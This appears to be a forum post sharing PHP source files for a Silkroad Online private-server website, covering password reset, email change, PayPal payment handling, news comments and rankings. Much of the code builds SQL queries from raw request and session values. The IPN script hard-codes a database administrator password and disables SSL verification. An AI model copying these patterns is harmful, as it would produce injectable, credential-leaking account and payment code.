</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php break;
}
}
break;
case('lookup'):
if(core::$sql -> numRows("select * from srcms_epin") > 0)
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Generate new Epin code</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Generate new Epin code</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
<table class="reg-page table table-striped" border="0" cellpadding="0" cellspacing="0">
<tr>
<td>Code</td>
<td>Silk</td>
<tr/>
<?php $hCodesData = core::$sql -> exec("select * from srcms_epin");
while($row = mssql_fetch_array($hCodesData))
{?>
<tr>
<td><b class="color-red"><?php echo $row[code];?></b></td>
<td><b class="color-green"><?php echo $row[silkAmount];?></b></td>
<tr/>
<?php }?>
</table>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
else
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Generate new Epin code</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Generate new Epin code</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid margin-bottom-10">
Please, generate some epin codes first.
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
break;
default:echo "Unknown subaction<br/>";break;
}
#echo "<br/>";
#misc::back();
}
break;
default:
echo "Unknown action";
break;
}
?>
cem
كود PHP:
<?php
if(isset($_GET['uid']))
{
if(security::isSecureString($_GET['uid'], 3))
{
$uid = $_GET['uid'];
if(core::$sql -> numRows("select * from PW_Restore where RandomPASS = '$uid'") == 0)
{
echo 'this UID is incorrect or have been changed , request a new UID.';
} else {
if(isset($_POST['submit']))
{
//process data
if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
if(strlen($_POST['password_new']) > 32) $errors[] = "Password [new] too long";
if(strlen($_POST['password_new']) < 6) $errors[] = "Passwrod [new] too short";
if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";
if(count($errors) > 0)
{
foreach($errors as $nElement)
{
echo $nElement.".<br/>";
}
misc::back();
}
else
{
//verify
if(user::RestorePass($_GET['uid'], $_POST['password_new']))
{
echo "Password changed successfully. <br/>";
misc::redirect('?pg=news', 1);
}
else
{
echo "Invalid old password specified.<br/>";
misc::back();
}
}
}
else core::$ucp -> ForgotpwForm();
}
} } else {
echo 'Entry is invalid.';
}
?>
emailreplace
كود PHP:
<?php
if (isset($_POST['replacemail1'])) {
if(!security::isSecureString($_SESSION['username'], 3)) $errors[] = "Username field contains forbidden symbols";
if(!security::isSecureString($_POST['email'], 2)) $errors[] = "Email field contains forbidden symbols";
if(!security::isCorrectEmail($_POST['email'])) $errors[] = "Invalid email address";
if(count($errors) > 0)
{
for($i = 0; $i < count($errors); $i++)
{
echo $errors[$i].".<br/>";
}
}
else
{
core::$sql -> changeDB('acc');
$user = $_SESSION['username'];
$email = $_POST['email'];
if (empty($_SESSION['username']) || empty($_POST['email'])) {
echo 'Error :';
echo '<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['replacemail1']);
} else {
$check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
if ($check !== 1) {
echo 'Error :';
echo '<br />';
echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['replacemail1']);
} else {
$title = "Your Email Change Link!";
$getrandom = misc::genRandomString();
$datetime = gmDate('Y-m-d H:i:s');
$content = "HolySro Email Change Link : http://holysro.com/?pg=cem&uid=$getrandom \n Get inside to change your Email \n if you didnt request it , please ignore this mail.!";
mail($email, "[HolySro Email Change] ".$title, $content."\nEmail sent from: www.holysro.com");
core::$sql -> changeDB('acc');
$ZsCheck = core::$sql -> numRows("select UserID from Email_Change where UserID = '$user'");
if ($ZsCheck == 1) {
core::$sql -> exec("update Email_Change set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
} else {
core::$sql -> exec("insert into Email_Change(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
}
echo "instructions to Email Change sent to your mailbox [ $email ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>";
unset($_POST['replacemail1']);
misc::redirect("?pg=news", 2);
}
}
} } else {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
<div class="container">
<h1 class="color-green pull-left">Change your email</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Change your email</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<form class="log-page" role="form" method="post" action=""/>
<h3>Change your email</h3>
<div class="input-prepend">
<span class="add-on"><i class="icon-user"></i></span>
<input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="example: [email protected]" />
</div>
<div class="controls form-inline">
<input class="btn-u pull-right" type="submit" name="replacemail1" value="Send Me Link To Mail" />
</div><br />
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }?>
forgotpw
كود PHP:
<?php
global $core;
if (isset($_POST['forgotpassword'])) {
if(!security::isSecureString($_POST['username'], 3)) $errors[] = "Username field contains forbidden symbols";
if(!security::isSecureString($_POST['email'], 2)) $errors[] = "Email field contains forbidden symbols";
if(!security::isCorrectEmail($_POST['email'])) $errors[] = "Invalid email address";
if(count($errors) > 0)
{
for($i = 0; $i < count($errors); $i++)
{
echo $errors[$i].".<br/>";
}
}
else
{
core::$sql -> changeDB('acc');
$user = $_POST['username'];
$email = $_POST['email'];
if (empty($_POST['username']) || empty($_POST['email'])) {
echo 'Error :';
echo '<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['forgotpassword']);
} else {
$check = core::$sql -> numRows("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
if ($check !== 1) {
echo 'Error :';
echo '<br />';
echo "User with following email/password doesn't exist! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['forgotpassword']);
} else {
$passw = core::$sql -> exec("select Name from TB_User where StrUserID = '$user' and Email = '$email'");
while($row = mssql_fetch_array($passw)) {
$pass = $row['Name'];
}
$title = "Your password!";
$getrandom = misc::genRandomString();
$datetime = gmDate('Y-m-d H:i:s');
$getsiteurl = $_SERVER['SERVER_NAME'];
$servername = $core -> aConfig['serverName'];
$content = "$servername Password Reset Link : http://$getsiteurl/?pg=cpw&uid=$getrandom \n Get inside to change your password \n if you didnt request it , please ignore this mail.!";
mail($email, "[$servername Password Recovery] ".$title, $content."\nEmail sent from: $getsiteurl");
core::$sql -> changeDB('acc');
$ZsCheck = core::$sql -> numRows("select UserID from PW_Restore where UserID = '$user'");
if ($ZsCheck == 1) {
core::$sql -> exec("update PW_Restore set RandomPASS ='$getrandom' ,createtime = '$datetime',ipaddr = '$_SERVER[REMOTE_ADDR]' where UserID = '$user'");
} else {
core::$sql -> exec("insert into PW_Restore(UserID,RandomPASS,createtime,ipaddr) values('$user','$getrandom','$datetime','$_SERVER[REMOTE_ADDR]')");
}?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
<div class="container">
<h1 class="color-green pull-left">Reset Password</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li class="active">Reset Password</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
<div class="container">
<div class="span8">
<div class="headline">
<h3>Instructions</h3>
</div>
instructions to reset your password sent to your mailbox [ <code><?php echo $email;?></code> ] - please check your mailbox! <br /> In case you haven't received the email from us - check your spam folder! <br /><a href='?pg=index'>Return to main page</a>
<?php unset($_POST['forgotpassword']);?>
</div>
</div>
</div><!--/row-fluid--><!-- End Purchase Block -->
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
}
} } else {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
<div class="container">
<h1 class="color-green pull-left">Reset Password</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Reset Password</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<form class="log-page" action="" method="post">
<h3>Reset Password</h3>
<p>To start the procedure, please enter your username and mail.</p>
<div class="input-prepend">
<span class="add-on"><i class="icon-user"></i></span>
<input class="input-xlarge" type="text" maxlength="16" name="username" autocomplete="off" onfocus="clearText(this);" placeholder="Username">
</div>
<div class="input-prepend">
<span class="add-on"><i class="icon-lock"></i></span>
<input class="input-xlarge" autocomplete="off" onfocus="clearText(this);" type="text" maxlength="32" name="email" placeholder="[email protected]">
</div>
<div class="controls form-inline">
<button class="btn-u pull-right" class="button" type="submit" name="forgotpassword" value="Request Password">Submit</button>
</div>
<br />
</form>
</div><!--/row-fluid-->
</div><!--/container-->
<!--=== End Content Part ===-->
<?php }
?>
forums
كود PHP:
<?php
global $core;
echo "Redirecting...";
misc::redirect($core -> aConfig['forumLink'], 2);
?>
ipn
كود PHP:
<?php
$con = mssql_connect('WIN-58LMRAF4MSQ\SQLEXPRESS','sa','hkjhldkdhq@012012') // Edit to your Settings (SQL,ID,PW) .
or die('Could not connect to the server!');
// Select a database:
mssql_select_db('SRO_VT_ACCOUNT_Tito') // Edit to you Account Database!! .
or die('Could not select a database.');
$ppEmail = '[email protected]'; // Edit This Email to your Paypal!!! .
$personalEmail = '[email protected]'; // Edit This Email to your Paypal!!! .
$amountUsd = array('5.00','10.00','15.00','25.00','50.00');// Edit The Price Here ! (must be double (XX.XX)!) .
$usdToSilks = array(5=>300, 10=>700, 15=>1100, 25=>2000, 50=>4500);// Edit Silks From Price 10=>500 [10$ = 500 Silk] .
//$amountEur = array(7.00,10.00,14.00,21.00);
// tell PHP to log errors to ipn_errors.log in this directory
ini_set('log_errors', true);
ini_set('error_log', dirname(__FILE__).'/ipn_errors.log');
// intantiate the IPN listener
include('ipnlistener.php');
$listener = new IpnListener();
// tell the IPN listener to use the PayPal test sandbox
$listener->use_sandbox = false;
// try to process the IPN POST
try {
$listener->requirePostMethod();
$verified = $listener->processIpn();
} catch (Exception $e) {
error_log($e->getMessage());
exit(0);
}
if ($verified) {
$errmsg = ''; // stores errors from fraud checks
// Make sure the payment status is "Completed"
if ($_POST['payment_status'] != 'Completed') {
// simply ignore any IPN that is not completed
exit(0);
}
// Make sure seller email matches your primary account email.
if ($_POST['receiver_email'] != $ppEmail) {
$errmsg .= "'receiver_email' does not match: ";
$errmsg .= $_POST['receiver_email']."\n";
}
//checks currency
if ($_POST['mc_currency'] != 'USD') {
$errmsg .= "'mc_currency' does not match: ";
$errmsg .= $_POST['mc_currency']."\n";
}
// Make sure the amount(s) paid match
if ($_POST['mc_currency'] = 'USD') {
if (!in_array($_POST['mc_gross'],$amountUsd)) {
$errmsg .= "'mc_gross' does not match: ";
$errmsg .= $_POST['mc_gross']."\n";
}
}
/* if ($_POST['mc_currency'] = 'EUR') {
if (!in_array(number_format($_POST['mc_gross'],2),number_format($amountEur, 2))) {
$errmsg .= "'mc_gross' does not match: ";
$errmsg .= $_POST['mc_gross']."\n";
}
}
*/
// Ensure the transaction is not a duplicate.
$txn_id = ms_escape_string($_POST['txn_id']);
$sql = "SELECT * FROM paypal WHERE txn_id = '$txn_id'";
$r = mssql_query($sql);
if (!$r) {
error_log(mysql_error());
exit(0);
}
// $exists = mssql_query($r, 0);
$exists = mssql_num_rows($r);
mssql_free_result($r);
if ($exists<>0) {
$errmsg .= "'txn_id' has already been processed: ".$_POST['txn_id']."\n";
}
if (!empty($errmsg)) {
// manually investigate errors from the fraud checking
$body = "IPN failed fraud checks: \n$errmsg\n\n";
$body .= $listener->getTextReport();
mail($personalEmail, 'Paypal Buyer Notice!', $body);
error_log($body); exit(0);
} else {
$payer_email = ms_escape_string($_POST['payer_email']);
$mc_gross = ms_escape_string($_POST['mc_gross']);
$username = ms_escape_string($_POST['custom']);
$timenow = date("y-m-d H:i:s", time());
$sql = "INSERT INTO paypal (txn_id,payer_email,mc_gross,username,date)VALUES
('$txn_id', '$payer_email', $mc_gross, '$username', '$timenow')"; // Add A logs of buys for server owner [Naty48] .
if (!mssql_query($sql)) {
error_log(mysql_error());
exit(0);
}
//silk update [NATY48]
$silkAmount = $usdToSilks[(int)$mc_gross];
mssql_query("exec CGI.CGI_WebPurchaseSilk 0,'$username',0,$silkAmount,0"); // will execute automated in game update of silks.
}
} else {
// manually investigate the invalid IPN .
// mail($personalEmail, 'Invalid IPN', $listener->getTextReport());
}
function ms_escape_string($data) {
if ( !isset($data) or empty($data) ) return '';
if ( is_numeric($data) ) return $data;
$non_displayables = array(
'/%0[0-8bcef]/', // url encoded 00-08, 11, 12, 14, 15
'/%1[0-9a-f]/', // url encoded 16-31
'/[\x00-\x08]/', // 00-08
'/\x0b/', // 11
'/\x0c/', // 12
'/[\x0e-\x1f]/' // 14-31
);
foreach ( $non_displayables as $regex )
$data = preg_replace( $regex, '', $data );
$data = str_replace("'", "''", $data );
return $data;
}
?>
ipnlistener
كود PHP:
<?php
class IpnListener {
public $use_curl = true;
public $force_ssl_v3 = false;
/**
* If true, an SSL secure connection (port 443) is used for the post back
* as recommended by PayPal. If false, a standard HTTP (port 80) connection
* is used. Default true.
*
* @var boolean
*/
public $use_ssl = true;
/**
* If true, the paypal sandbox URI www.sandbox.paypal.com is used for the
* post back. If false, the live URI www.paypal.com is used. Default false.
*
* @var boolean
*/
public $use_sandbox = false;
/**
* The amount of time, in seconds, to wait for the PayPal server to respond
* before timing out. Default 30 seconds.
*
* @var int
*/
public $timeout = 30;
private $post_data = array();
private $post_uri = '';
private $response_status = '';
private $response = '';
const PAYPAL_HOST = 'www.paypal.com';
const SANDBOX_HOST = 'www.sandbox.paypal.com';
/**
* Post Back Using cURL
*
* Sends the post back to PayPal using the cURL library. Called by
* the processIpn() method if the use_curl property is true. Throws an
* exception if the post fails. Populates the response, response_status,
* and post_uri properties on success.
*
* @param string The post data as a URL encoded string
*/
protected function curlPost($encoded_data) {
if ($this->use_ssl) {
$uri = 'https://'.$this->getPaypalHost().'/cgi-bin/webscr';
$this->post_uri = $uri;
} else {
$uri = 'http://'.$this->getPaypalHost().'/cgi-bin/webscr';
$this->post_uri = $uri;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uri);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $encoded_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
if ($this->force_ssl_v3) {
curl_setopt($ch, CURLOPT_SSLVERSION, 3);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$this->response = curl_exec($ch);
$this->response_status = strval(curl_getinfo($ch, CURLINFO_HTTP_CODE));
if ($this->response === false || $this->response_status == '0') {
$errno = curl_errno($ch);
$errstr = curl_error($ch);
throw new Exception("cURL error: [$errno] $errstr");
}
}
/**
* Post Back Using fsockopen()
*
* Sends the post back to PayPal using the fsockopen() function. Called by
* the processIpn() method if the use_curl property is false. Throws an
* exception if the post fails. Populates the response, response_status,
* and post_uri properties on success.
*
* @param string The post data as a URL encoded string
*/
protected function fsockPost($encoded_data) {
if ($this->use_ssl) {
$uri = 'ssl://'.$this->getPaypalHost();
$port = '443';
$this->post_uri = $uri.'/cgi-bin/webscr';
} else {
$uri = $this->getPaypalHost(); // no "http://" in call to fsockopen()
$port = '80';
$this->post_uri = 'http://'.$uri.'/cgi-bin/webscr';
}
$fp = fsockopen($uri, $port, $errno, $errstr, $this->timeout);
if (!$fp) {
// fsockopen error
throw new Exception("fsockopen error: [$errno] $errstr");
}
$header .= "POST /cgi-bin/webscr HTTP/1.0\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: ".strlen($encoded_data)."\r\n";
$header .= "Connection: Close\r\n\r\n";
fputs($fp, $header.$encoded_data."\r\n\r\n");
while(!feof($fp)) {
if (empty($this->response)) {
// extract HTTP status from first line
$this->response .= $status = fgets($fp, 1024);
$this->response_status = trim(substr($status, 9, 4));
} else {
$this->response .= fgets($fp, 1024);
}
}
fclose($fp);
}
private function getPaypalHost() {
if ($this->use_sandbox) return IpnListener::SANDBOX_HOST;
else return IpnListener::PAYPAL_HOST;
}
/**
* Get POST URI
*
* Returns the URI that was used to send the post back to PayPal. This can
* be useful for troubleshooting connection problems. The default URI
* would be "ssl://www.sandbox.paypal.com:443/cgi-bin/webscr"
*
* @return string
*/
public function getPostUri() {
return $this->post_uri;
}
/**
* Get Response
*
* Returns the entire response from PayPal as a string including all the
* HTTP headers.
*
* @return string
*/
public function getResponse() {
return $this->response;
}
/**
* Get Response Status
*
* Returns the HTTP response status code from PayPal. This should be "200"
* if the post back was successful.
*
* @return string
*/
public function getResponseStatus() {
return $this->response_status;
}
/**
* Get Text Report
*
* Returns a report of the IPN transaction in plain text format. This is
* useful in emails to order processors and system administrators. Override
* this method in your own class to customize the report.
*
* @return string
*/
public function getTextReport() {
$r = '';
// date and POST url
for ($i=0; $i<80; $i++) { $r .= '-'; }
$r .= "\n[".date('m/d/Y g:i A').'] - '.$this->getPostUri();
if ($this->use_curl) $r .= " (curl)\n";
else $r .= " (fsockopen)\n";
// HTTP Response
for ($i=0; $i<80; $i++) { $r .= '-'; }
$r .= "\n{$this->getResponse()}\n";
// POST vars
for ($i=0; $i<80; $i++) { $r .= '-'; }
$r .= "\n";
foreach ($this->post_data as $key => $value) {
$r .= str_pad($key, 25)."$value\n";
}
$r .= "\n\n";
return $r;
}
/**
* Process IPN
*
* Handles the IPN post back to PayPal and parsing the response. Call this
* method from your IPN listener script. Returns true if the response came
* back as "VERIFIED", false if the response came back "INVALID", and
* throws an exception if there is an error.
*
* @param array
*
* @return boolean
*/
public function processIpn($post_data=null) {
$encoded_data = 'cmd=_notify-validate';
if ($post_data === null) {
// use raw POST data
if (!empty($_POST)) {
$this->post_data = $_POST;
$encoded_data .= '&'.file_get_contents('php://input');
} else {
throw new Exception("No POST data found.");
}
} else {
// use provided data array
$this->post_data = $post_data;
foreach ($this->post_data as $key => $value) {
$encoded_data .= "&$key=".urlencode($value);
}
}
if ($this->use_curl) $this->curlPost($encoded_data);
else $this->fsockPost($encoded_data);
if (strpos($this->response_status, '200') === false) {
throw new Exception("Invalid response status: ".$this->response_status);
}
if (strpos($this->response, "VERIFIED") !== false) {
return true;
} elseif (strpos($this->response, "INVALID") !== false) {
return false;
} else {
throw new Exception("Unexpected response from PayPal.");
}
}
/**
* Require Post Method
*
* Throws an exception and sets a HTTP 405 response header if the request
* method was not POST.
*/
public function requirePostMethod() {
// require POST requests
if ($_SERVER['REQUEST_METHOD'] && $_SERVER['REQUEST_METHOD'] != 'POST') {
header('Allow: POST', true, 405);
throw new Exception("Invalid HTTP request method.");
}
}
}
?>
news
كود PHP:
<?php
global $core;
if(isset($_GET['del']))
{
$nCommentID = (int)$_GET['del'];
$isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
if(core::$sql -> numRows("select * from srcms_newscomments where id='$nCommentID' and author='$_SESSION[username]'") > 0 || $isAdmin == "admin")
{
core::$sql -> exec ("delete from srcms_newscomments where id='$nCommentID'");
misc::redirect("?pg=news&comment=$_GET[backid]",0);
}
else echo "<br/><br/>You can't delete comment that does not belong to you.";
}
if(!isset($_GET['comment']))
{
$hQuery = core::$sql -> exec("select * from srcms_news order by id desc");
?>
<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
<div class="container">
<div class="span8">
<?php
while($row = mssql_fetch_array($hQuery))
{
$nComments = core::$sql -> numRows("select * from srcms_newscomments where newsID='$row[id]'");
$szAvatarUrl = user::getUserAvatarUrl($row['author']);
$dateee = gmDate('Y-m-d H:i:s');
$nComments = core::$sql -> getRow("select count(*) from srcms_newscomments where newsID='$row[id]'");
$userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($row['author'])."'");
$szUserRank = user::getRankText($userRank);
$row['content'] = security::fromHTML($row['content']);
$row['content'] = misc::applyAttributesToText($row['content']);
$datetime = strtotime($row['time']);
$mssqldate = date("d/m/y", $datetime);?>
<?php if(strtotime($row['time']) > strtotime('last week')) {
$_NEW = "";
} else {
$_NEW = "<code>New</code>";
}?>
<div class="headline">
<h3>
<?php echo $_NEW;?><a href="#" onclick="return false" onmousedown="javascript:toggleSlideBox('NewsID<?php echo $row[id];?>')">
<?php echo $row[title];?> <img src="assets/img/expand.png" alt="Toggle" title="Show content" style="position:relative;" />
</a> <font size="2">(at <?php echo $mssqldate;?>)</font>
</h3>
</div>
<small style="display:none;" id="NewsID<?php echo $row[id];?>"><?php echo $row[content];?></small>
<br />
<?php
}?>
</div>
</div>
</div><!--/row-fluid--><!-- End Purchase Block -->
<?php } else {
$nID = (int)$_GET['comment']; //cast to int .
if(!isset($_GET['page'])) $_GET['page'] = 1;
if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
{
$getTitle = core::$sql -> getRow("select title from srcms_news where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
<div class="container">
<h1 class="color-green pull-left"><?php echo $getTitle;?></h1>
<ul class="pull-right breadcrumb">
<li><a href="/">Home</a> <span class="divider">/</span></li>
<li><a href="">News</a> <span class="divider">/</span></li>
<li class="active"><?php echo $getTitle;?></li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<?php $hGetComments = core::$sql -> exec("select * from srcms_newscomments where newsID='$nID'");
$commentData = array();
$a = 0;
while($row = mssql_fetch_array($hGetComments))
{
$commentData[$a] = array($row['id'],$row['text'],$row['author'],$row['time']);
$a++;
}
$_GET['page'] = (int)$_GET['page'];
if(!isset($_GET['page'])) $_GET['page'] = 1;
for($i = (($_GET['page'] - 1) * 10); $i < (($_GET['page']) * 10);$i++)
{
$nCommentID = $commentData[$i][0];
$szText = $commentData[$i][1];
$szText = misc::applyAttributesToText($szText);
$szText = security::fromHTML($szText);
$szAuthor = $commentData[$i][2];
$szTime = $commentData[$i][3];
if(strlen($szText) == 0) break;
$szAvatar = user::getUserAvatarUrl($szAuthor);
$commentPanelLinks = "";
$isCommentOwner = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($szAuthor)."'");
$isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
if($szAuthor == $_SESSION['username'] || $isAdmin == "admin")
{
$commentPanelLinks = "<a href='?pg=news&del=$nCommentID&backid=$nID'><b>Delete</b></a>";
}
$szRank = user::getRankText($isCommentOwner);?>
<div class="media">
<a class="pull-left" href="#"><img class="media-object" src="<?php echo $szAvatar;?>" alt="<?php echo ucwords($szAuthor);?>"></a>
<div class="media-body"><h4 class="media-heading"><a href='?pg=viewprofile&username=<?php echo $szAuthor;?>'> <?php echo $szRank; echo" "; echo ucwords($szAuthor);?> </a></h4><?php echo $szText;?><div class="pull-right">Posted at <?php echo $szTime;?> - <?php echo $commentPanelLinks;?></div></div>
</div>
<hr/>
<?php }
if($_GET['page'] != 1) echo "<a href='?pg=news&comment=$nID&page=".($_GET['page'] - 1)."'><</a>";
$nPages = 0;
for($a = 1,$i = 0; $i < count($commentData); $i++)
{
if($i % 10 == 0)
{
echo "<a href='?pg=news&comment=$nID&page=$a'>$a</a> ";
$a++;
$nPages++;
}
}
if($_GET['page'] < $nPages) echo "<a class='pageblue' href='?pg=news&comment=$nID&page=".($_GET['page'] + 1)."'>></a>";
if(isset($_SESSION['username']))
{
if(!isset($_POST['submit']))
{?>
<br /><form method="post">
<textarea class="form-control" name="commentText" rows="3" placeholder="Type your message here"></textarea><br>
<input type="submit" class="btn btn-info" name="submit" value="Submit">
</form>
<script>CKEDITOR.replace( 'commentText' );</script>
<?php }
else
{
$cleanText = stripslashes(security::toHTML($_POST['commentText']));
if(strlen($cleanText) < $core -> aConfig['minNewsCommentLen'] || strlen($cleanText) > $core -> aConfig['maxNewsCommentLen'])
{
echo "<br/>Your message is too short or too long. It has to be at least <b>".$core -> aConfig['minNewsCommentLen']."</b>
symbols long, your one is just <b>".strlen($cleanText)."</b> symbols long. Max length is ".$core -> aConfig['maxNewsCommentLen'].".<br/>";
misc::back();
}
else
{
$datetime = misc::getDateTime();
core::$sql -> exec("insert into srcms_newscomments(newsID, author, text, time) values('$nID','$_SESSION[username]', '$cleanText', '$datetime')");
echo "<br/><br/><b>Your comment has been successfully added</b>";
misc::redirect("?pg=news&comment=$nID", 1);
}
}
} else echo "<br/><br/>You must be logged in to post comments";
}
else
echo "<br/>You can't comment news article that doesn't exist.";
}
?>
rank
كود PHP:
<?php
global $core;
switch($_GET['type'])
{
//Characters Ranking
case('char'):
{?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
<div class="container">
<h1 class="color-green pull-left">Character Ranking</h1>
<ul class="pull-right breadcrumb">
<li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
<li><a href="">Pages</a> <span class="divider">/</span></li>
<li class="active">Character Ranking</li>
</ul>
</div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
<!--=== Content Part ===-->
<div class="container">
<div class="row-fluid">
<?php if(isset($_GET['name']) && security::isSecureString($_GET['name'], 3))
{
$nCharID = char::charIDByCharname($_GET['name']);
if($nCharID == 0)
{
echo "There is no character with such nickname<br/>";
}
else
{
//main
//switch to acc db
$szUsername = user::usernameByCharname($_GET['name']);
$bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
if($bCanView == 1) //DEBUG >= = =
{
//switch to shd db
core::$sql -> changeDB("shard");
$hGuild = core::$sql -> getRow("select JobType from _CharTrijob where CharID='$nCharID'");
$jobType = char::jobTypeByID($hGuild);
$hData = core::$sql -> fetchArray("select * from _Char where CharID='$nCharID'");
if(strlen($hData['NickName16']) < 2) $hData['NickName16'] = "<b>None</b>";
$ownerStr = null;
if($core -> aConfig['allowShowCharOwner'] == 1)
{
$ownerStr = "<a href='?pg=viewprofile&username=$szUsername' class='color-red'>$szUsername</a>";
}
#echo $ownerStr;
/*
for character gold add this line :
<td>Gold</td><td>$hData[RemainGold]</td></tr>
*/
$nGuildName = guild::guildNameByID($hData['GuildID']);
$nCharID = char::charIDByCharname($_GET['name']);
core::$sql -> changeDB("log");
$charstatus = core::$sql -> exec("select top 1 EventID,EventTime from _LogEventChar where CharID = '$nCharID' order by EventTime DESC");
if(core::$sql -> numRows("select top 1 EventID,EventTime from _LogEventChar where CharID = '$nCharID' order by EventTime DESC") == 0)
{
$StatusIS = "<img src='img/status/offline.gif' /> Offline";
}
else
{
while($row1 = mssql_fetch_array($charstatus))
{
$charEvent = $row1['EventID'];
switch($charEvent)
{
case 4:
$StatusIS = "<img src='img/status/online.gif' /> <b class='color-green'>Online</b>";
break;
case 6:
$StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
break;
default:
$StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
break;
}
}
}
core::$sql -> changeDB("acc");
//Tiger Girl
$uniquetg = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_CH_TIGERWOMAN' ");
//Cerburus
$uniqueker = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_EU_KERBEROS' ");
//IVY
$uniqueivy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_AM_IVY' ");
//Uruchi
$uniqueuruchi = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_OA_URUCHI' ");
//Isy
$uniqueisy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_KK_ISYUTARU' ");
//Lord Yarkan
$uniquelord = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TK_BONELORD' ");
//Demon
$uniquedemon = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_RM_TAHOMET' ");
//SOSO
